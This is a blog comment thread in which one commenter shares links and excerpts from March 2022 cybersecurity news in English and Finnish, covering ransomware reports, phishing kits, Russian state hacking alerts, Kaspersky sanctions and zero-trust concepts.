Asiantuntijat: Kyberuhkat vaativat lujaa johtamista “Tietoturvapomot nousevat nyt johtoryhmiin”
https://www.kauppalehti.fi/uutiset/asiantuntijat-kyberuhkat-vaativat-lujaa-johtamista-tietoturvapomot-nousevat-nyt-johtoryhmiin/75cfbf30-728c-4cbb-92e0-d64845992137
Kemianteollisuuden turvauhkia käsitelleessä tilaisuudessa useat asiantuntijat korostivat, että johtamisella on iso merkitys, kun yritys varautuu lisääntyviin kyberuhkiin. “Varautumista pitää johtaa samoin kuin muutakin liiketoimintaa. On oltava lyhyen ja pitkäntähtäimen tavoitteita. Kyberturvallisuus on ajettava osaksi organisaation kulttuuria”, sanoi Orionin tiejtoturvapäällikkö Petri Vilander. Siihen liittyy myös aktiivinen turvallisuusriskejä koskeva viestintä omalle henkilöstölle. Vilanderin mukaan se ei saa olla salamyhkäistä, vaan siinä on oltava mahdollisimman avoin.
Tomi Engdahl says:
Tutkimus: Joka viides yritys on maksanut tai maksaisi lunnaita tiedoistaan
https://www.kauppalehti.fi/uutiset/tutkimus-joka-viides-yritys-on-maksanut-tai-maksaisi-lunnaita-tiedoistaan/5295a94d-631a-451d-9738-6edc9109a5a4
Haittaohjelmat, kiristyshaittaohjelmat ja tietojenkalastelu ovat kansainvälisten organisaatioiden pysyvä riesa. Liikevaihdoltaan yli
100 miljoonan dollarin organisaatioista joka viides (21 %) on viimeisen vuoden aikana kokenut kiristysohjelmahyökkäyksen, ja 43 prosentille hyökkäyksellä oli on ollut merkittävä vaikutus toimintaan.
Tiedot selviävät juuri julkaistusta 2022 Thales Data Threat Reportista. Tutkimuksen mukaan viidesosa (22 %) organisaatioista ympäri maailmaa on myöntänyt maksaneensa tai arvioi, että tarvittaessa maksaisi lunnaita tiedoistaan. Lue myös:
https://cpl.thalesgroup.com/data-threat-report
Tomi Engdahl says:
US and Canada reinstate cybercrime forum to prevent Russian cyber-attacks https://portswigger.net/daily-swig/us-and-canada-reinstate-cybercrime-forum-to-prevent-russian-cyber-attacks
The US and Canada have reestablished the Cross-Border Crime Forum
(CBCF) to discuss cybercrime and other issues. In a statement released yesterday (March 22), the US Department of Justice (DoJ) said that the two nations will meet to discuss further cooperation on cross-border crimes. “Given the interconnectedness of US and Canadian industry and economies, we affirm our shared commitment to work bilaterally to combat common cyber threats, such as ransomware attacks, and to strengthen critical infrastructure cybersecurity and resilience, ” the release reads. The focus on collaboration comes in the wake of the war in Ukraine. The statement reads: “We are working vigilantly to protect the cybersecurity of our critical infrastructure sectors given Russia’s further invasion of Ukraine.
Tomi Engdahl says:
Serious Security: DEADBOLT the ransomware that goes straight for your backups https://nakedsecurity.sophos.com/2022/03/23/serious-security-deadbolt-the-ransomware-that-goes-straight-for-for-your-backups/
In January 2021, reports surfaced of a backup-busting ransomware strain called Deadbolt, apparently aimed at small businesses, hobbyists and serious home users. As far as we can see, Deadbolt deliberately chose a deadly niche in which to operate: users who needed backups and were well-informed enough to make them, but who didn’t have the time or funds to look after those backups as a full-time task, or even as part of a reliable part-time routine. Many ransomware attacks unfold with cybercriminals breaking into your network, mapping out all your computers, scrambling all the files on all of them in unison, and then changing everyone’s wallpaper to show a blackmail demand along the lines of, “Pay us $BIGVAL and we’ll send you a decryption key to unlock everything.”. Deadbolt, however, ignores the desktops and laptops on your network, instead finding and attacking vulnerable network-attached storage (NAS) devices directly over the internet.
Gone in 52 Secondsand 42 Minutes: A Comparative Analysis of Ransomware Encryption Speed https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html
Do you feel like every other cybersecurity news story mentioned ransomware in 2021? Does it feel like you can’t turn on a cybersecurity podcast and not hear the “R” word? We feel the same way, and as a cybersecurity vendor, we felt that we should also contribute to the noise. :-). But we did want to try and do something different.
We decided to measure how fast ransomware encrypts files; not just one or two ransomware binaries, but dozens of them all using Splunk. Why?
Well, partly because we have an unlimited Splunk license, but also because we couldn’t find the answer to the question: “How long do you have until ransomware encrypts your systems?” This seems like knowledge that organizations could use to organize their defenses.
Tomi Engdahl says:
Samba 4.16 release strips away more SMB 1 https://www.theregister.com/2022/03/23/samba_416_toctou_smb/
The Samba project just released version 4.16, and with it parts of the veteran SMB 1 file-sharing protocol are being permanently removed.
Among other changes, Samba 4.16 removes the SMB 1 commands that allow a client computer to request the server copy a file without sending it over the network, and the commands that cause server-side wildcard expansion. Both are rarely used, but this is the beginning of the end for accessing Samba shares from any 20th century version of Windows.
SMB 1 was already deprecated and off by default since Samba 4.11.
Although SMB over NetBEUI first appeared in LAN Manager in 1987, SMB over TCP/IP is about 30 years old. Microsoft has wanted to banish it for some time. It’s been deprecated since 2015, but as late as XP and Windows Server 2003, it was the only version the OS understood.
Tomi Engdahl says:
Motivating developers to write secure code https://www.ncsc.gov.uk/blog-post/motivating-developers-to-write-secure-code
As we spoke about previously we continue to see the exploitation of common software vulnerabilities leading to high impact outcomes. This is despite the availability of security tools and processes (think Security Development Lifecycles) that are designed to help improve the security of software development. This leads us to question why these tools are not having the desired impact. Back in 2017 we trailed an NCSC-sponsored research project looking into how software developers could be motivated and enabled to adopt and integrate secure coding practices. Run by our Research Institute, RISCS, the project’s full title is: Motivating Jenny to write secure software: community and culture of coding’. It has now borne fruit in the form of a toolkit, designed to help organisations of all sizes change the conversation about security within and around development teams. This blog post will outline the major findings of the research, which through engagement with developers, has produced a toolkit to help developers consider security during their daily jobs. Toolkit:
https://motivatingjenny.org/index.html
Tomi Engdahl says:
Closing the cybersecurity skills gap Microsoft expands efforts to 23 countries https://blogs.microsoft.com/blog/2022/03/23/closing-the-cybersecurity-skills-gap-microsoft-expands-efforts-to-23-countries/
Cybersecurity continues to be a significant threat for governments, businesses and individuals around the world. From supply chain disruptions to ransomware attacks, cybercriminals have become increasingly sophisticated and the threat landscape more diverse.
These cybersecurity challenges are compounded by a workforce shortage; there simply aren’t enough people with the cybersecurity skills needed to fill open jobs. This is a global problem. By 2025, there will be
3.5 million cybersecurity jobs open globally, representing a 350% increase over an eight-year period. We recently announced a national skilling campaign in the United States, where for every two jobs in cybersecurity today, a third goes unfilled. We’re working with community colleges to help close the gap and increase diversity in the profession. Today, Microsoft is announcing the expansion of our cybersecurity skills campaign to an additional 23 countries. The expansion will see new targeted investments in the following
countries: Australia, Belgium, Brazil, Canada, Colombia, Denmark, France, Germany, India, Ireland, Israel, Italy, Japan, Korea, Mexico, New Zealand, Norway, Poland, Romania, South Africa, Sweden, Switzerland, and the United Kingdom. These countries have an elevated cyberthreat risk, coupled with a significant gap in their cybersecurity workforces both in terms of the number of professionals employed in cybersecurity vs. the demand, as well as a lack of diversity.
Tomi Engdahl says:
Microsoft, Nvidia extend Azure confidential computing to GPUs https://www.theregister.com/2022/03/23/microsoft_and_nvidia_extend_azure/
Microsoft has linked up with Nvidia to enable confidential computing in its Azure cloud to encompass the graphics giant’s GPUs. This will allow GPUs to process workloads on Azure that call for the highest level of protection, such as applications in healthcare or financial services. With confidential computing support for Nvidia A100 GPUs paired with hardware-protected virtual machines, organizations will be able to use even sensitive datasets to train and deploy more accurate AI models without compromising security or performance, Microsoft claimed.
Nvidia’s Morpheus AI security framework to land in April https://www.theregister.com/2022/03/23/nvidia_morpheus_ai/
Nvidia teased several updates to its Morpheus AI security framework at GTC this week, and also announced it would make the application framework generally available in April. In addition to releasing a pre-built version of Morpheus, Nvidia will also publish the framework’s full source code on GitHub to allow developers to modify Morpheus and build security applications on top of the software. Since the chip design emitted Morpheus via an early-access program nine months ago, almost 700 developers and security vendors including Cisco, F5, Lacework, and Splunk have built threat detection and log-ingestion applications using Nvidia’s framework, said Bartley Richardson, senior AI infrastructure manager at Nvidia, during a security session on Tuesday.
Tomi Engdahl says:
Some developers are fouling up open-source software https://www.zdnet.com/article/some-developers-are-fouling-up-open-source-software
- From ethical concerns, a desire for more money, and simple obnoxiousness, a handful of developers are ruining open-source for everyone. One of the most amazing things about open-source isn’t that it produces great software. It’s that so many developers put their egos aside to create great programs with the help of others. Now, however, a handful of programmers are putting their own concerns ahead of the good of the many and potentially wrecking open-source software for everyone.
Tomi Engdahl says:
Poliisi varoittaa: Ethän lähde mukaan rikolliseen verkkotoimintaan edes kriisitilanteessa https://poliisi.fi/blogi/-/blogs/poliisi-varoittaa-ethan-lahde-mukaan-rikolliseen-verkkotoimintaan-edes-kriisitilanteessa
Poliisin tietojen ja havaintojen mukaan Ukrainan tilanne on synnyttänyt ilmiön, jossa verkon käyttäjät ovat alkaneet tehdä verkkorikoksia niitä toimijoita kohtaan, joiden katsotaan liittyvän Venäjän hyökkäykseen tai tukevan sitä. Haluamme muistuttaa, että oli motiivi mikä tahansa, se ei oikeuta lain rikkomiseen.
Tomi Engdahl says:
An Investigation of Cryptocurrency Scams and Schemes https://www.trendmicro.com/en_us/research/22/c/an-investigation-of-cryptocurrency-scams-and-schemes.html
We provide an overview of the diverse range of NFT- and cryptocurrency-related scams that malicious actors use to steal assets worldwide. Lisäksi:
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/an-investigation-of-cryptocurrency-scams-and-schemes/technical_brief_keeping_assets_safe_from_cryptocurrency_scams_and_schemes.pdf
Tomi Engdahl says:
Phishing-kit market: what’s inside “off-the-shelf” phishing packages https://securelist.com/phishing-kit-market-whats-inside-off-the-shelf-phishing-packages/106149/
Phishing kits are ready-to-deploy packages which require the bare minimum effort to use. Moreover, their developers usually provide instructions with their products for inexperienced attackers.
Tomi Engdahl says:
Nearly $7 billion was lost through internet crimes in 2021, surpassing a record set in 2020 by about $1.7 billion, according to the FBI’s annual Internet Crime Report https://therecord.media/fbi-6-9-billion-lost-through-internet-crimes-in-2021/
Lisäksi: FBI Report
https://www.ic3.gov/Media/PDF/AnnualReport/2021_IC3Report.pdf
Tomi Engdahl says:
Some developers are fouling up open-source software | ZDNet
https://www.zdnet.com/article/some-developers-are-fouling-up-open-source-software/
Tomi Engdahl says:
Tactics, Techniques, and Procedures of Indicted State-Sponsored Russian Cyber Actors Targeting the Energy Sector https://www.cisa.gov/uscert/ncas/alerts/aa22-083a
On March 24, 2022, the U.S. Department of Justice unsealed indictments of three Russian Federal Security Service (FSB) officers and a Russian Federation Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM) employee for their involvement in the following intrusion campaigns against U.S. and international oil refineries, nuclear facilities, and energy companies.
Tomi Engdahl says:
Mining data from Cobalt Strike beacons
https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/
Today, RIFT is making this extensive beacon dataset publicly available in combination with the open-source release of dissect.cobaltstrike, our Python library for studying and parsing Cobalt Strike related data.
Tomi Engdahl says:
Europe’s Digital Markets Act Takes a Hammer to Big Tech https://www.wired.com/story/digital-markets-act-messaging/
The DMA, which is expected to be enforced before the end of this year, will require companies like Apple, Facebook parent Meta, and Google to let their services intertwine with those of rivals.
Tomi Engdahl says:
US says Kaspersky poses unacceptable risk to national security https://www.bleepingcomputer.com/news/security/us-says-kaspersky-poses-unacceptable-risk-to-national-security/
The Federal Communications Commission (FCC) added Russian cybersecurity firm Kaspersky to its Covered List, saying it poses unacceptable risks to U.S. national security.
HackerOne kicks Kaspersky’s bug bounty program off its platform https://www.bleepingcomputer.com/news/security/hackerone-kicks-kaspersky-s-bug-bounty-program-off-its-platform/
Bug bounty platform HackerOne disabled Kaspersky’s bug bounty program on Friday following sanctions imposed on Russia and Belarus after the invasion of Ukraine.
Tomi Engdahl says:
Precursor malware’ infection may be sign you’re about to get ransomware, says startup https://www.theregister.com/2022/03/26/lumu-ransomware-precursor-malware/
A ransomware infection is usually preceded by what Lumu founder and CEO Ricardo Villadiego calls “precursor malware, ” essentially reconnaissance malicious code that has been around for a while and which lays the groundwork for the full ransomware campaign to come.
Tomi Engdahl says:
Windows Event Log Evasion Review
http://windowsir.blogspot.com/2022/03/windows-event-log-evasion-review.html
In her blog post, Lina references detection techniques, something that is extremely important for all analysts to understand. What Lina is alluding to is the need for analysts to truly understand their tools, and how they work
Tomi Engdahl says:
Phishing kits constantly evolve to evade security software https://www.bleepingcomputer.com/news/security/phishing-kits-constantly-evolve-to-evade-security-software/
Modern phishing kits sold on cybercrime forums as off-the-shelve packages feature multiple, sophisticated detection avoidance and traffic filtering systems to ensure that internet security solutions won’t mark them as a threat.
Tomi Engdahl says:
Meet the Secretive US Company Building an Unbreakable’ Internet Inside Russia https://www.vice.com/en/article/z3n5e9/russian-internet-lantern
The company is Lantern, which says it has seen staggering growth inside Russia in the last four weeks for its app that allows users to bypass restrictions the Kremlin has put in place on platforms like Facebook, Twitter, and Instagram.
Tomi Engdahl says:
Open Source Software Faces Threats of Protestware and Sabotage | WIRED
https://www.wired.com/story/open-source-sabotage-protestware/
Tomi Engdahl says:
Is a nationstate digital deterrent scenario so farfetched?
https://www.welivesecurity.com/2022/03/24/is-nation-state-digital-deterrent-scenario-so-far-fetched/
Imagine this unlikely scenario where one side or the other starts lobbing zero-day grenades at the other side’s tech, causing them to send several of their own zero-day missiles back.
Tomi Engdahl says:
US, EU Sign Data Transfer Deal to Ease Privacy Concerns
https://www.securityweek.com/us-eu-sign-data-transfer-deal-ease-privacy-concerns
The European Union and United States made a breakthrough in their yearslong battle over the privacy of data that flows across the Atlantic with a preliminary agreement Friday that paves the way for Europeans’ personal information to be stored in the U.S.
President Joe Biden and European Commission President Ursula von der Leyen announced the deal during Biden’s stop in Brussels while on a European tour amid Russia’s war in Ukraine.
Business groups hailed the announcement, saying it will provide relief to thousands of companies, including tech giants like Google and Facebook, that faced uncertainty over their ability to send data between the U.S. and Europe, which has much stricter regulations on data privacy.
The agreement came hours after EU officials agreed on sweeping new digital rules to rein in the power of big tech companies such as Facebook and Google.
“Today we’ve agreed to unprecedented protections for data privacy and security for our citizens,” Biden said. “This new arrangement will enhance the Privacy Shield framework, promote growth and innovation in Europe and the United States, and help companies — both small and large — compete in the digital economy.”
Von der Leyen said the agreement “will enable predictable and trustworthy data flows between the EU and the U.S., safeguarding privacy and civil liberties.”
Tomi Engdahl says:
Demystifying Zero Trust
https://www.securityweek.com/demystifying-zero-trust
While many vendors use terms that include “zero trust,” they often use it to mean different things
The pandemic increased the need to secure remote and hybrid workers, and a side-effect has been a surge in interest, hype, and confusion surrounding zero trust concepts. Vendors have been quick to put out a wide range of messaging on zero trust, which has led to a lot of misunderstanding as to what zero trust actually is.
A neutral place to start is the NIST Special Publication 800-207, which says, zero trust “is not a single architecture but a set of guiding principles for workflow, system design, and operations.” NIST refers to these principles as the “tenets” of zero trust.
In other words, zero trust is not simply a product. If someone says it is, they probably either don’t know what they’re talking about or have watered down their marketing to the point of making it misleading.
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207.pdf
Tomi Engdahl says:
Here are a few names and acronyms you’re likely to see and what they mean from a practical standpoint.
• Zero trust access (ZTA) is about knowing and controlling who and what is on your network. Role-based access control is a critical component of access management. ZTA covers user endpoints with a least access policy that grants users the minimum level of network access required for their role.
• Zero trust network access (ZTNA) is a way of controlling access to applications regardless of where the user or the application resides. And unlike a VPN, ZTNA extends the zero-trust model beyond the network and reduces the attack surface by hiding applications from the internet.
• Zero trust edge (ZTE) is an architecture described by Forrester that converges networking and security but isn’t limited to the cloud like Secure Access Service Edge (SASE). Based on zero-trust principles, it starts on-premises with a software-defined wide area network (SD-WAN), firewalls, and ZTNA. It ends in the cloud with routing, secure web gateways, and cloud security gateways.
https://www.securityweek.com/demystifying-zero-trust
Tomi Engdahl says:
A Sheep in Wolf’s Clothing: Technology Alone is a Security Facade
https://www.securityweek.com/sheep-wolfs-clothing-technology-alone-security-facade
The power of the technology to defend our IT systems is only as good as our ability to evolve it in the face of ever-changing adversary tradecraft
After over 20 years in cybersecurity, I firmly believe that technology alone has not, and will not, win the war on cyberattacks. The idea of a purely technical solution providing lasting protection is flawed from the outset. The claims of security vendors that only bring technology to the cyber fight is the equivalent of a sheep in wolf’s clothing. It sounds great and looks convincing, but almost never lives up to the hype. Now, I am not saying that technology is not important, even critical, in this fight. It is critical if it is informed properly.
As attack surfaces grew and the exploitation of IT systems became known, and eventually mainstream, the importance of threat intelligence became clear. This insight is still critical today and provides an important service to companies that want to understand their attack surface or have experienced a breach. Today, we also recognize that threat intelligence in continuum and combined with technology is also critical.
Cyber threat intelligence has a few key principles it must follow for it to be effective. I will approach this from an email security perspective since that is the area in which I am most involved.
1. Threat intelligence sources must be agnostic to vendor technology
2. Your user base is a valuable source of intelligence for your enterprise
3. Threat intelligence must be timely and actionable
I am very much a technologist that loves building great products. I also believe technology alone will not solve cyberattacks. I know the power of the technology we build to defend our IT systems is only as good as our ability to evolve it in the face of ever-changing adversary tradecraft. Therefore, vendor agnostic technology, married with actionable, globally-sourced, and continually evolving intelligence, augmented by humans, is needed to defend our enterprises.
Tomi Engdahl says:
Achieving Positive Outcomes With Multi-Domain Cyber and Open Source Intelligence
https://www.securityweek.com/achieving-positive-outcomes-multi-domain-cyber-and-open-source-intelligence
Tomi Engdahl says:
Public and Private Sector Security: Better Protection by Collaboration
https://www.securityweek.com/public-and-private-sector-security-better-protection-collaboration
Tomi Engdahl says:
FBI: 649 Ransomware Attacks Reported on Critical Infrastructure Organizations in 2021
https://www.securityweek.com/fbi-649-ransomware-attacks-reported-critical-infrastructure-organizations-2021
The Federal Bureau of Investigation’s (FBI) Internet Crime Complaint Center (IC3) says it received 649 complaints of ransomware attacks targeting critical infrastructure organizations in 2021.
Ransomware attacks hit 14 out of 16 critical infrastructure sectors last year, with healthcare and public health impacted the most, the IC3 notes in its 2021 Internet Crime Report (PDF).
The IC3 received a total of 148 complaints of ransomware attacks on the healthcare sector, far more than the number of reported hits on the next most targeted sectors, namely financial services (89) and information technology (74).